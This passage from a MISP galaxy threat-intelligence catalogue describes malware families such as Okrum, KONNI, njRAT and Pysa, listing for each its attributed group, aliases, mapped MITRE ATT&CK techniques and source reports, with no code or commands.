uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Linker Hijacking - T1574.006" with estimative-language:likelihood-probability="almost-certain"

Table 5051. Table References
Links
https://attack.mitre.org/software/S0394
https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/

Okrum - S0439

[Okrum](https://attack.mitre.org/software/S0439) is a Windows backdoor that has been seen in use since December 2016 with strong links to [Ke3chang](https://attack.mitre.org/groups/G0004).(Citation: ESET Okrum July 2019)

The tag is: misp-galaxy:mitre-malware="Okrum - S0439"

Okrum - S0439 is also known as:

Okrum

View relationships graph

Okrum - S0439 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="User Activity Based Checks - T1497.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 5052. Table References
Links
https://attack.mitre.org/software/S0439
https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf

MoleNet - S0553

[MoleNet](https://attack.mitre.org/software/S0553) is a downloader tool with backdoor capabilities that has been observed in use since at least 2019.(Citation: Cybereason Molerats Dec 2020)

The tag is: misp-galaxy:mitre-malware="MoleNet - S0553"

MoleNet - S0553 is also known as:

MoleNet

View relationships graph

MoleNet - S0553 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 5053. Table References
Links
https://attack.mitre.org/software/S0553
https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf

BoomBox - S0635

[BoomBox](https://attack.mitre.org/software/S0635) is a downloader responsible for executing next stage components that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)

The tag is: misp-galaxy:mitre-malware="BoomBox - S0635"

BoomBox - S0635 is also known as:

BoomBox

View relationships graph

BoomBox - S0635 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Execution Guardrails - T1480" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Account - T1087.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 5054. Table References
Links
https://attack.mitre.org/software/S0635
https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

xCaon - S0653

[xCaon](https://attack.mitre.org/software/S0653) is an HTTP variant of the [BoxCaon](https://attack.mitre.org/software/S0651) malware family that has used by [IndigoZebra](https://attack.mitre.org/groups/G0136) since at least 2014. [xCaon](https://attack.mitre.org/software/S0653) has been used to target political entities in Central Asia, including Kyrgyzstan and Uzbekistan.(Citation: Checkpoint IndigoZebra July 2021)(Citation: Securelist APT Trends Q2 2017)

The tag is: misp-galaxy:mitre-malware="xCaon - S0653"

xCaon - S0653 is also known as:

xCaon

View relationships graph

xCaon - S0653 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Boot or Logon Autostart Execution - T1547" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 5055. Table References
Links
https://attack.mitre.org/software/S0653
https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/
https://securelist.com/apt-trends-report-q2-2017/79332/

GPlayed - S0536

[GPlayed](https://attack.mitre.org/software/S0536) is an Android trojan with a broad range of capabilities.(Citation: Talos GPlayed)

The tag is: misp-galaxy:mitre-malware="GPlayed - S0536"

GPlayed - S0536 is also known as:

GPlayed

View relationships graph

GPlayed - S0536 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1603" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"

Table 5056. Table References
Links
https://attack.mitre.org/software/S0536
https://blog.talosintelligence.com/2018/10/gplayedtrojan.html

KONNI - S0356

[KONNI](https://attack.mitre.org/software/S0356) is a Windows remote administration too that has been seen in use since 2014 and evolved in its capabilities through at least 2017. [KONNI](https://attack.mitre.org/software/S0356) has been linked to several campaigns involving North Korean themes.(Citation: Talos Konni May 2017) [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family. There is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)(Citation: Medium KONNI Jan 2020)

The tag is: misp-galaxy:mitre-malware="KONNI - S0356"

KONNI - S0356 is also known as:

KONNI

View relationships graph

KONNI - S0356 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 5057. Table References
Links
https://attack.mitre.org/software/S0356
https://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html
https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/
https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b

HyperStack - S0537

[HyperStack](https://attack.mitre.org/software/S0537) is a RPC-based backdoor used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2018. [HyperStack](https://attack.mitre.org/software/S0537) has similarities to other backdoors used by [Turla](https://attack.mitre.org/groups/G0010) including [Carbon](https://attack.mitre.org/software/S0335).(Citation: Accenture HyperStack October 2020)

The tag is: misp-galaxy:mitre-malware="HyperStack - S0537"

HyperStack - S0537 is also known as:

HyperStack

View relationships graph

HyperStack - S0537 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Default Accounts - T1078.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inter-Process Communication - T1559" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

Table 5058. Table References
Links
https://attack.mitre.org/software/S0537
https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity

Remexi - S0375

[Remexi](https://attack.mitre.org/software/S0375) is a Windows-based Trojan that was developed in the C programming language.(Citation: Securelist Remexi Jan 2019)

The tag is: misp-galaxy:mitre-malware="Remexi - S0375"

Remexi - S0375 is also known as:

Remexi

View relationships graph

Remexi - S0375 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

Table 5059. Table References
Links
https://attack.mitre.org/software/S0375
https://securelist.com/chafer-used-remexi-malware/89538/

njRAT - S0385

[njRAT](https://attack.mitre.org/software/S0385) is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.(Citation: Fidelis njRAT June 2013)

The tag is: misp-galaxy:mitre-malware="njRAT - S0385"

njRAT - S0385 is also known as:

njRAT
Njw0rm
LV
Bladabindi

View relationships graph

njRAT - S0385 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fast Flux DNS - T1568.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 5060. Table References
Links
https://attack.mitre.org/software/S0385
https://www.threatminer.org/_reports/2013/fta-1009---njrat-uncovered-1.pdf
https://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.html
https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/

Crutch - S0538

[Crutch](https://attack.mitre.org/software/S0538) is a backdoor designed for document theft that has been used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2015.(Citation: ESET Crutch December 2020)

The tag is: misp-galaxy:mitre-malware="Crutch - S0538"

Crutch - S0538 is also known as:

Crutch

View relationships graph

Crutch - S0538 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

Table 5061. Table References
Links
https://attack.mitre.org/software/S0538
https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/

Pysa - S0583

[Pysa](https://attack.mitre.org/software/S0583) is a ransomware that was first used in October 2018 and has been seen to target particularly high-value finance, government and healthcare organizations.(Citation: CERT-FR PYSA April 2020)

The tag is: misp-galaxy:mitre-malware="Pysa - S0583"

Pysa - S0583 is also known as:

Pysa
Mespinoza

View relationships graph

Pysa - S0583 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 5062. Table References
Links
https://attack.mitre.org/software/S0583
